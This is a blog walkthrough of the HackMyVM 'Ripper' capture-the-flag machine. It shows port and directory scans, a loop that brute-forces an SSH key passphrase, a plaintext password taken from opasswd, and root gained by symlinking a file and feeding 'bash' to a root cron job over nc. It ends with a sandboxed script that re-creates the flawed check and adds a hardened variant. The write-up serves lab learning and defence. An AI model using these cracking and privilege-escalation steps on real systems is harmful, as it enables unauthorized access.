Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Ripper Walkthrough

Scan ports.

 nmap -sV -sC -p-  -oN ports.log
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 gobuster dir -u -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]

Check staff_statements.txt. "Old ssh connection files" hints at a backed-up private key lying in the web root, such as id_rsa.bak.

 cat staff_statements.txt   
 The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.

Note that the VM's console screen shows the user name jack.


Download id_rsa.bak and try it against SSH: the key is passphrase-protected.

 2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]
 ssh jack@ -i id_rsa.bak
 Enter passphrase for key 'id_rsa.bak':

Use the following loop to brute-force the passphrase. ssh-keygen's -c (change comment) only succeeds when -P supplies the right passphrase, so the first word that makes it succeed is the passphrase. Note that on success -c rewrites the key file's comment; `ssh-keygen -y -P "$pass" -f id_rsa.bak` performs the same check without modifying the file, and `ssh2john id_rsa.bak` plus john is the usual alternative for a large wordlist.

 while read -r pass; do
   if ssh-keygen -c -C "jack@" -P "$pass" -f id_rsa.bak >/dev/null 2>&1; then
     echo "$pass"; break
   fi
 done < /usr/share/wordlists/rock_ascii.txt

Log in as jack. After some manual enumeration, nothing useful turns up.

Download linpeas from GitHub and upload it to the VM.

Run it; one line stands out. /etc/security/opasswd normally holds hashes of users' previous passwords (pam_unix's remember= option), so a readable copy, let alone one containing a plaintext value, is worth trying against every account.

 [+] Hashes inside passwd file? ........... No                                                                                        
 [+] Writable passwd file? ................ No
 [+] Credentials in fstab/mtab? ........... No
 [+] Can I read shadow files? ............. No
 [+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
 [+] Can I write in network-scripts? ...... No
 [+] Can I read root folder? .............. No

It turns out to be the password of another user, helder.

Download pspy64 from GitHub, upload it to the VM and watch the processes as helder. A cron job run by root (UID=0) shows up.

 2021/06/02 08:22:01 CMD: UID=0    PID=1205   | /usr/sbin/CRON -f 
 2021/06/02 08:22:01 CMD: UID=0    PID=1206   | /usr/sbin/CRON -f
 2021/06/02 08:22:01 CMD: UID=0    PID=1207   | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi

The job runs as root. `nc -vv -q 1 localhost 10000 > /root/.local/out` connects to port 10000 on the loopback interface and saves whatever it receives; then, if /root/.local/helder.txt (readable only by root) has the same contents as /home/helder/passwd.txt (which we control), it runs `chmod +s /usr/bin/<received string>`. We cannot read root's secret, but we do not need it: if /home/helder/passwd.txt is a symbolic link to /root/.local/helder.txt, root's `cat` reads the same file on both sides of the comparison and it always succeeds. Nothing validates the received string either, so whoever can listen on port 10000 chooses which binary in /usr/bin becomes SUID.

So we create the symbolic link and start a listener on port 10000 with the string "bash" ready. When the cron job connects it reads "bash", and within a minute /usr/bin/bash has the SUID bit set.

 helder@ripper:~$ln -s /root/.local/helder.txt ./passwd.txt
 helder@ripper:~$echo bash |nc -nlvp 10000
 listening on [any] 10000 ...
 connect to [] from (UNKNOWN) [] 43374
 helder@ripper:~$ls -la /usr/bin/bash
 -rwsr-sr-x 1 root root 1168776 Apr 18  2019 /usr/bin/bash
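To make the symlink trick concrete, here is a sandboxed re-creation of the cron job's check (an added example, not the VM's script or the author's code). It runs entirely under a temporary directory, so no root, nc or real chmod +s is involved: a constructed secret under `root/.local/helder.txt` stands in for root's file, and `home/helder/passwd.txt` for the file helder controls. The hardened variant at the end is an assumed fix, not something the machine ships.

```shell
#!/bin/sh
# Sandbox re-creation of the Ripper cron job's check (added example, not the
# VM's own script). Everything lives under a temp dir, so no root, nc or real
# chmod +s is involved: "$sb/root/.local/helder.txt" stands in for root's
# secret and "$sb/home/helder/passwd.txt" for the file helder controls.

new_sandbox() {
  sb=$(mktemp -d)
  mkdir -p "$sb/root/.local" "$sb/home/helder" "$sb/usr/bin"
  printf 'sup3rs3cr3t\n' > "$sb/root/.local/helder.txt"   # constructed secret
  : > "$sb/usr/bin/bash"                                   # stand-in binary
  printf '%s\n' "$sb"
}

# The comparison exactly as pspy showed it. $2 plays the string root read
# from port 10000. Prints the path the job would chmod +s, nothing otherwise.
cron_vulnerable() {
  sb=$1; name=$2
  if [ "$(cat "$sb/root/.local/helder.txt")" = "$(cat "$sb/home/helder/passwd.txt")" ]; then
    printf '%s\n' "$sb/usr/bin/$name"     # real job: chmod +s "/usr/bin/$name"
  fi
}

# helder's move from the walkthrough: make passwd.txt a symlink to root's
# file, so root's cat reads the same bytes on both sides of the "=".
helder_symlink() {
  ln -sf "$1/root/.local/helder.txt" "$1/home/helder/passwd.txt"
}

# Assumed hardened variant (not from the page): reject a symlink, since cat
# follows it, and accept only a plain binary name, never "../" or "/".
cron_hardened() {
  sb=$1; name=$2
  f="$sb/home/helder/passwd.txt"
  if [ -L "$f" ]; then return 0; fi
  case "$name" in *[!a-zA-Z0-9_-]*|'') return 0 ;; esac
  if [ "$(cat "$sb/root/.local/helder.txt")" = "$(cat "$f")" ]; then
    printf '%s\n' "$sb/usr/bin/$name"
  fi
}

# Demo: a guessed value fails, the symlink succeeds, the hardened check refuses it.
sb=$(new_sandbox)
printf 'guess\n' > "$sb/home/helder/passwd.txt"
echo "guess   : '$(cron_vulnerable "$sb" bash)'"
helder_symlink "$sb"
echo "symlink : '$(cron_vulnerable "$sb" bash)'"
echo "hardened: '$(cron_hardened "$sb" bash)'"
rm -rf "$sb"
```

The `-L` test only closes the hole this walkthrough uses (and still leaves a window between the check and the `cat`); the real lesson is that a root job must never let a user-controlled file decide whether, or on which path, it runs `chmod +s`.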

Finally get root. The -p flag matters: without it bash drops the effective UID back to the real UID when the two differ, and the SUID bit is wasted.

 helder@ripper:~$/usr/bin/bash -p
 uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)